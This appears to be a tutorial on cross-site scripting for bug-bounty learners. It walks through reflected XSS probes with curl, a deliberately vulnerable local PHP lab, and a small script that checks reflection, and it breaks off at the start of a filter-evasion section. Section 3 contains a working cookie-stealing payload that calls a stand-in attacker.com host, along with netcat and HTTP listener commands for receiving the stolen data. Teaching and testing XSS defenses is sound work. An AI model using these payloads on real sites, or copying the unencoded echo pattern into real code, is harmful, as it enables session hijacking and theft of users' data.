
Introduction:
Cross-Site Scripting (XSS) remains one of the most pervasive web vulnerabilities: an attacker injects client-side script into a page served by a trusted site, and the victim's browser runs it with that site's origin. When user input is written back into a response without output encoding, the attacker can hijack sessions, deface pages, or redirect victims to phishing sites. Mastering XSS is non-negotiable for any aspiring bug bounty hunter or application security professional.
Learning Objectives:
- Distinguish between Reflected, Stored, and DOM‑based XSS with real‑world exploit scenarios.
- Build a local vulnerable lab to safely test manual and automated XSS payloads.
- Implement defensive coding techniques (contextual output encoding), Content Security Policy (CSP), and countermeasures against filter evasion.
You Should Know:
1. Anatomy of an XSS Attack: How a Single Script Can Hijack a Session
This section explains the core mechanism of reflected XSS. A vulnerable web page takes a parameter (e.g., search query) and prints it directly into the HTML response without encoding. An attacker crafts a malicious link containing JavaScript; when a victim clicks it, the script executes in their browser.
Step-by-step guide:
- Identify a reflection point: submit a harmless marker such as `test123` and search the response source for it.
- Inject the classic proof-of-concept:
<script>alert('XSS')</script>
- URL-encode the payload for transmission in the query string:
%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
- Send the request via curl (Linux/macOS):
curl "http://vulnerable-site.com/search?q=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
- On Windows (PowerShell):
Invoke-WebRequest -Uri "http://vulnerable-site.com/search?q=%3Cscript%3Ealert('XSS')%3C/script%3E"
- Inspect the response body. curl and Invoke-WebRequest do not execute JavaScript, so no alert box appears at this stage; what you are looking for is the `<script>` tag coming back unencoded. If it does, open the same URL in a browser to confirm the alert fires. If the response contains `&lt;script&gt;` instead, the parameter is being output-encoded and this payload will not execute.
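The following is an added example, not code from the original post: it automates the two mechanical parts of the procedure above, building the percent-encoded attack URL and classifying how a response body reflects the probe. Because a command-line client never runs JavaScript, the only thing it can tell you is whether the tag came back byte-for-byte. The host, parameter name and the two sample response bodies are constructed for this example.

```javascript
// Added example (not from the original post): what the curl/Invoke-WebRequest step can
// and cannot tell you. A command-line client never executes JavaScript, so the check is
// whether the probe comes back byte-for-byte in the response body. The host, parameter
// name and the two sample responses below are constructed for this example.

const PAYLOAD = "<script>alert('XSS')</script>";

// Step 3 by hand: percent-encode the payload into the query string. encodeURIComponent
// leaves ', ( and ) alone and encodes "/" as %2F; the server decodes this to the same
// string as the page's hand-encoded %3Cscript%3Ealert(%27XSS%27)%3C/script%3E.
function buildAttackUrl(base, param, payload) {
  return `${base}?${param}=${encodeURIComponent(payload)}`;
}

// The transformation a correctly encoding page applies (PHP htmlspecialchars with ENT_QUOTES).
function htmlEncode(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#039;");
}

// Classify a response: "raw" means the tag is intact and will execute once a browser
// renders the page; "encoded" means it was output-encoded and renders as text;
// "absent" means this parameter is not reflected here at all (try other parameters).
function classifyReflection(body, payload) {
  if (body.includes(payload)) return "raw";
  if (body.includes(htmlEncode(payload))) return "encoded";
  return "absent";
}

// Constructed responses: the lab's xss_test.php as written, and the same script after
// wrapping $_GET["q"] in htmlspecialchars().
const VULNERABLE_BODY = `<html><body>Search results for: ${PAYLOAD}</body></html>`;
const PATCHED_BODY = `<html><body>Search results for: ${htmlEncode(PAYLOAD)}</body></html>`;

console.log(buildAttackUrl("http://localhost/xss_test.php", "q", PAYLOAD));
console.log("unpatched lab:", classifyReflection(VULNERABLE_BODY, PAYLOAD));
console.log("patched lab:  ", classifyReflection(PATCHED_BODY, PAYLOAD));
```

Run it with `node reflect_check.js` (the filename is arbitrary). Feeding `classifyReflection` the body returned by curl is the honest version of "observe the alert box": a `raw` result is worth confirming in a browser, an `encoded` one means this particular context is handled and you should look for another (attribute, URL, JavaScript) context instead.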
2. Building Your XSS Lab: Setting Up a Safe Environment
Never test on live sites without permission. Use a local virtual machine or Docker to host a deliberately vulnerable web app.
Step-by-step guide:
- On Linux (Ubuntu/Debian):
sudo apt update && sudo apt install apache2 php -y
sudo systemctl restart apache2
echo '<?php echo "Search results for: " . $_GET["q"]; ?>' | sudo tee /var/www/html/xss_test.php
- On Windows (using XAMPP):
- Download and install XAMPP, then start Apache from the control panel.
- Navigate to `C:\xampp\htdocs\` and create `xss_test.php` with the same PHP code.
- Access the vulnerable script in a browser:
http://localhost/xss_test.php?q=<script>alert(1)</script>
- To simulate stored XSS, add a simple comment form that appends input to a text file and later displays the file's contents without encoding. The payload then fires for every visitor who loads the page, not only for the one who clicked a crafted link.
3. Advanced Payloads: From Alert to Cookie Stealer
Moving beyond alerts, a real attacker steals session cookies to impersonate victims.
Step-by-step guide:
- Craft a payload that reads `document.cookie` and exfiltrates it to an attacker-controlled server:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
- Set up a simple listener on your attack machine (Linux/macOS):
python3 -m http.server 8080
- On Windows (PowerShell, Python required):
python -m http.server 8080
- Alternatively, use netcat (Linux); note that it accepts a single connection and then exits:
nc -lvnp 8080
- When the victim executes the payload, the request line, cookie value included, appears in the listener's log. The port in the payload URL must match the listener: the payload above addresses the default HTTPS port, so either run the listener there or append `:8080` to the URL. For HTTPS exfiltration, use a tool like `ngrok` to expose the local listener behind a public TLS endpoint.
- Caveat: `document.cookie` cannot read cookies set with the `HttpOnly` flag, which is exactly why session cookies should carry it. Against such a target the injected script still runs inside the victim's session and can issue authenticated requests on their behalf, but it cannot copy the cookie itself.
4. Bypassing Filters: Evasion Techniques Every Red Teamer Needs
Many applications filter `